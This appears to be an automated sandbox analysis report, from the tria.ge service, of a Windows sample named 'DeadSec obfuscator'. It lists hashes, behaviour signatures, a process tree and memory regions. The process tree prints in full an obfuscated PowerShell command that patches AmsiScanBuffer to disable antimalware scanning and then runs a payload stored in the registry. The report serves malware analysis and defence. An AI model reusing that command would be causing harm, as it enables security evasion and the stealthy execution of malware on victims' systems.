Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    1050s
  • max time network
    866s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    05/08/2024, 18:07

General

  • Target

    www.DeadSec0000000000-obfusecator.exe

  • Size

    164KB

  • MD5

    22d120454dd38d7f1a3f1cd0eb497f95

  • SHA1

    4c11a082bf8e64b21310b959821a9f7324aa8107

  • SHA256

    6fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c

  • SHA512

    1552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9

  • SSDEEP

    3072:2QpshPjBCk79JFsCN5dbTA4ZbenYm7MHdcytrkueBuG1/dhRAJiYr:2QpshPjBCuJH5d3fZbeT4KueBu4jRsr

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Drops file in System32 directory 16 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:568
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:964
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{6c5eff0e-55cd-40bd-a1ae-deff508062d1}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5112
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:620
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
          1⤵
            PID:704
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
            1⤵
              PID:888
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
              1⤵
                PID:328
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                1⤵
                  PID:356
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
                  1⤵
                    PID:696
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
                    1⤵
                    • Indicator Removal: Clear Windows Event Logs
                    PID:1068
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                      PID:1088
                      • c:\windows\system32\taskhostw.exe
                        taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                        2⤵
                          PID:2060
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ImtaWnwVfQKC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HmbKHKAbTqANra,[Parameter(Position=1)][Type]$TnHEBEYSqM)$ffDGBxVRMEa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+'l'+'e'+[Char](103)+''+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'em'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+'g'+'a'+''+'t'+''+'e'+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+','+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+'S'+'e'+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+'A'+'n'+''+'s'+'i'+'C'+''+'l'+''+'a'+''+'s'+'s'+','+''+[Char](65)+'ut'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$ffDGBxVRMEa.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+'m'+'e,'+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+'yS'+[Char](105)+''+[Char](103)+','+[Char](80)+'ub'+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$HmbKHKAbTqANra).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+''+'a'+''+[Char](110)+''+'a'+'g'+[Char](101)+''+[Char](100)+'');$ffDGBxVRMEa.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+''+'k'+''+[Char](101)+'',''+'P'+'u'+'b'+'l'+[Char](105)+''+'c'+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+'S'+''+'i'+''+[Char](103)+''+','+''+'N'+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l',$TnHEBEYSqM,$HmbKHKAbTqANra).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+''+[Char](105)+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $ffDGBxVRMEa.CreateType();}$FoCJENRwGvBGq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+'tem'+'.'+''+[Char](100)+'ll')}).GetType(''+'M'+''+[Char](105)+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+'i'+'n'+[Char](51)+'2'+[Char](46)+'U'+[Char](110)+'s'+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+'v'+'e'+''+[Char](77)+''+'e'+'t'+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$CrAnXiljMkCtsk=$FoCJENRwGvBGq.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('Pu'+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+','+'S'+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TPFtWTnUSOkoVzmjUYM=ImtaWnwVfQKC @([String])([IntPtr]);$YNoXgXXzyNqEBuMsMXwQCu=ImtaWnwVfQKC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ouvHnzclJeP=$FoCJENRwGvBGq.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+'o'+'d'+[Char](117)+''+'l'+''+[Char](101)+'H'+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+'e'+''+[Char](108)+''+'3'+'2'+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$KGPznECuoTqwNx=$CrAnXiljMkCtsk.Invoke($Null,@([Object]$ouvHnzclJeP,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+''+'r'+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$WawBSCmXXIapDmhef=$CrAnXiljMkCtsk.Invoke($Null,@([Object]$ouvHnzclJeP,[Object](''+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l'+[Char](80)+'r'+'o'+''+[Char](116)+'ec'+[Char](116)+'')));$qTciFpz=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KGPznECuoTqwNx,$TPFtWTnUSOkoVzmjUYM).Invoke(''+[Char](97)+'ms'+[Char](105)+'.d'+[Char](108)+''+[Char](108)+'');$HvRbRCsMIdrjoRWnf=$CrAnXiljMkCtsk.Invoke($Null,@([Object]$qTciFpz,[Object](''+[Char](65)+''+[Char](109)+'siS'+'c'+''+'a'+'n'+'B'+''+'u'+''+[Char](102)+''+[Char](102)+''+'e'+''+[Char](114)+'')));$ZmfnpTLmEK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WawBSCmXXIapDmhef,$YNoXgXXzyNqEBuMsMXwQCu).Invoke($HvRbRCsMIdrjoRWnf,[uint32]8,4,[ref]$ZmfnpTLmEK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$HvRbRCsMIdrjoRWnf,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WawBSCmXXIapDmhef,$YNoXgXXzyNqEBuMsMXwQCu).Invoke($HvRbRCsMIdrjoRWnf,[uint32]8,0x20,[ref]$ZmfnpTLmEK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'TW'+[Char](65)+''+'R'+'E').GetValue(''+[Char](119)+''+'w'+''+'w'+''+[Char](115)+''+[Char](116)+''+'a'+''+'g'+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4900
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
                        1⤵
                          PID:1132
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                          1⤵
                            PID:1140
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k localservice -s nsi
                            1⤵
                              PID:1152
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
                              1⤵
                                PID:1268
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                1⤵
                                  PID:1312
                                  • c:\windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2984
                                    • \??\c:\windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:3456
                                      • \??\c:\windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:4116
                                        • \??\c:\windows\system32\sihost.exe
                                          sihost.exe
                                          2⤵
                                            PID:468
                                          • \??\c:\windows\system32\sihost.exe
                                            sihost.exe
                                            2⤵
                                              PID:2420
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
                                            1⤵
                                              PID:1416
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                              1⤵
                                                PID:1444
                                              • c:\windows\system32\svchost.exe
                                                c:\windows\system32\svchost.exe -k localservice -s EventSystem
                                                1⤵
                                                  PID:1452
                                                • c:\windows\system32\svchost.exe
                                                  c:\windows\system32\svchost.exe -k networkservice -s Dnscache
                                                  1⤵
                                                    PID:1480
                                                  • c:\windows\system32\svchost.exe
                                                    c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                    1⤵
                                                      PID:1568
                                                    • c:\windows\system32\svchost.exe
                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
                                                      1⤵
                                                        PID:1636
                                                      • c:\windows\system32\svchost.exe
                                                        c:\windows\system32\svchost.exe -k localservice -s netprofm
                                                        1⤵
                                                          PID:1648
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                          1⤵
                                                            PID:1740
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
                                                            1⤵
                                                              PID:1788
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                                                              1⤵
                                                                PID:1796
                                                              • c:\windows\system32\svchost.exe
                                                                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                1⤵
                                                                  PID:1860
                                                                • c:\windows\system32\svchost.exe
                                                                  c:\windows\system32\svchost.exe -k appmodel -s StateRepository
                                                                  1⤵
                                                                    PID:1900
                                                                  • C:\Windows\System32\spoolsv.exe
                                                                    C:\Windows\System32\spoolsv.exe
                                                                    1⤵
                                                                      PID:1524
                                                                    • c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
                                                                      1⤵
                                                                        PID:2072
                                                                      • c:\windows\system32\svchost.exe
                                                                        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                        1⤵
                                                                          PID:2208
                                                                        • c:\windows\system32\svchost.exe
                                                                          c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
                                                                          1⤵
                                                                            PID:2216
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                            1⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2244
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
                                                                            1⤵
                                                                            • Drops file in System32 directory
                                                                            • Modifies data under HKEY_USERS
                                                                            PID:2280
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
                                                                            1⤵
                                                                              PID:2336
                                                                            • C:\Windows\sysmon.exe
                                                                              C:\Windows\sysmon.exe
                                                                              1⤵
                                                                                PID:2344
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
                                                                                1⤵
                                                                                  PID:2388
                                                                                • c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                  1⤵
                                                                                    PID:2424
                                                                                  • c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                    1⤵
                                                                                      PID:2488
                                                                                    • c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                      1⤵
                                                                                        PID:2604
                                                                                      • c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
                                                                                        1⤵
                                                                                          PID:2968
                                                                                        • C:\Windows\system32\wbem\unsecapp.exe
                                                                                          C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                          1⤵
                                                                                            PID:2976
                                                                                          • c:\windows\system32\svchost.exe
                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
                                                                                            1⤵
                                                                                              PID:3092
                                                                                            • C:\Windows\Explorer.EXE
                                                                                              C:\Windows\Explorer.EXE
                                                                                              1⤵
                                                                                                PID:3288
                                                                                                • C:\Users\Admin\AppData\Local\Temp\www.DeadSec0000000000-obfusecator.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\www.DeadSec0000000000-obfusecator.exe"
                                                                                                  2⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:4896
                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:3816
                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                  1⤵
                                                                                                    PID:3988
                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k localservice -s CDPSvc
                                                                                                    1⤵
                                                                                                      PID:4700
                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                                                                                                      1⤵
                                                                                                        PID:3640
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
                                                                                                        1⤵
                                                                                                          PID:3964
                                                                                                        • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                          "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                          1⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:2476
                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                          1⤵
                                                                                                            PID:4124
                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                            1⤵
                                                                                                              PID:3892
                                                                                                            • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                              C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:5060
                                                                                                              • C:\Windows\System32\InstallAgent.exe
                                                                                                                C:\Windows\System32\InstallAgent.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:4036
                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                  1⤵
                                                                                                                    PID:4364
                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                    C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                    1⤵
                                                                                                                      PID:300

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\Windows\Temp\__PSScriptPolicyTest_xjhw3t5u.o4m.ps1

                                                                                                                      Filesize

                                                                                                                      1B

                                                                                                                      MD5

                                                                                                                      c4ca4238a0b923820dcc509a6f75849b

                                                                                                                      SHA1

                                                                                                                      356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                                      SHA256

                                                                                                                      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                                      SHA512

                                                                                                                      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                      Filesize

                                                                                                                      338B

                                                                                                                      MD5

                                                                                                                      ad306e0fe372fcd74ed11a9b7953997e

                                                                                                                      SHA1

                                                                                                                      27193dda05ad1065c9891ce9ccbac7e1e086635f

                                                                                                                      SHA256

                                                                                                                      e7b37c5dd1c141155d7053f1b1908554482eb48b8579d3fdce6a00256f38e424

                                                                                                                      SHA512

                                                                                                                      e26891a0b7ebba44947824fd6d54f5d4fd82050223f8e41367f63fa7beb7ec70eec606f0dbf5dfd3c3f1ec264c05c967259a454252bfbd5496a4bc1d0dc76cea

                                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187

                                                                                                                      Filesize

                                                                                                                      412B

                                                                                                                      MD5

                                                                                                                      087456508d26e75fa7bd22838ca75bfa

                                                                                                                      SHA1

                                                                                                                      ade78f35938c96f34daa009926066d03836fbeb6

                                                                                                                      SHA256

                                                                                                                      800a2ff46a962d9e905176cb2435681958c0e54f1bca4140b36802ef84937981

                                                                                                                      SHA512

                                                                                                                      c37a5ab53ba6e320b5d2d565875ca66d6dd3cdf0cdbfbaf5e6673d515acabb7688b5c4a6615aee54299697241a1c7578061605d7bda05cab7fcbd36e13e88671

                                                                                                                    • memory/568-54-0x000001EF80070000-0x000001EF8009C000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                    • memory/568-53-0x000001EF80070000-0x000001EF8009C000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                    • memory/568-62-0x000001EF80070000-0x000001EF8009C000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                    • memory/568-63-0x00007FFB37F45000-0x00007FFB37F46000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/568-52-0x000001EF80040000-0x000001EF80066000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      152KB

                                                                                                                    • memory/620-689-0x0000015EB5640000-0x0000015EB5666000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      152KB

                                                                                                                    • memory/620-75-0x00007FFAF7F30000-0x00007FFAF7F40000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/620-66-0x0000015EB5670000-0x0000015EB569C000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                    • memory/620-77-0x0000015EB5640000-0x0000015EB5666000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      152KB

                                                                                                                    • memory/620-78-0x00007FFB37F45000-0x00007FFB37F46000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/620-74-0x0000015EB5670000-0x0000015EB569C000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                    • memory/704-90-0x00007FFAF7F30000-0x00007FFAF7F40000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/704-89-0x000001D17A3D0000-0x000001D17A3FC000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                    • memory/704-81-0x000001D17A3D0000-0x000001D17A3FC000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                    • memory/888-94-0x00000203A7CD0000-0x00000203A7CFC000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                    • memory/888-101-0x00007FFAF7F30000-0x00007FFAF7F40000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/888-100-0x00000203A7CD0000-0x00000203A7CFC000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                    • memory/4900-33-0x00007FFB1C1D0000-0x00007FFB1CBBC000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      9.9MB

                                                                                                                    • memory/4900-0-0x00007FFB1C1D3000-0x00007FFB1C1D4000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/4900-5-0x0000026D9DF70000-0x0000026D9DF92000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      136KB

                                                                                                                    • memory/4900-6-0x00007FFB1C1D0000-0x00007FFB1CBBC000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      9.9MB

                                                                                                                    • memory/4900-10-0x0000026D9E130000-0x0000026D9E1A6000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      472KB

                                                                                                                    • memory/4900-7-0x00007FFB1C1D0000-0x00007FFB1CBBC000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      9.9MB

                                                                                                                    • memory/4900-24-0x00007FFB1C1D0000-0x00007FFB1CBBC000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      9.9MB

                                                                                                                    • memory/4900-43-0x00007FFB1C1D0000-0x00007FFB1CBBC000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      9.9MB

                                                                                                                    • memory/4900-30-0x0000026D9E0F0000-0x0000026D9E11A000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      168KB

                                                                                                                    • memory/4900-31-0x00007FFB37EA0000-0x00007FFB3807B000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      1.9MB

                                                                                                                    • memory/4900-32-0x00007FFB37C80000-0x00007FFB37D2E000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      696KB

                                                                                                                    • memory/5112-44-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/5112-38-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/5112-36-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/5112-35-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/5112-34-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/5112-49-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/5112-48-0x00007FFB37EA0000-0x00007FFB3807B000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      1.9MB

                                                                                                                    • memory/5112-688-0x00007FFB37EA0000-0x00007FFB3807B000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      1.9MB

                                                                                                                    • memory/5112-47-0x00007FFB37EA1000-0x00007FFB37FAF000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      1.1MB

                                                                                                                    • memory/5112-46-0x00007FFB37C80000-0x00007FFB37D2E000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      696KB

                                                                                                                    • memory/5112-45-0x00007FFB37EA0000-0x00007FFB3807B000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      1.9MB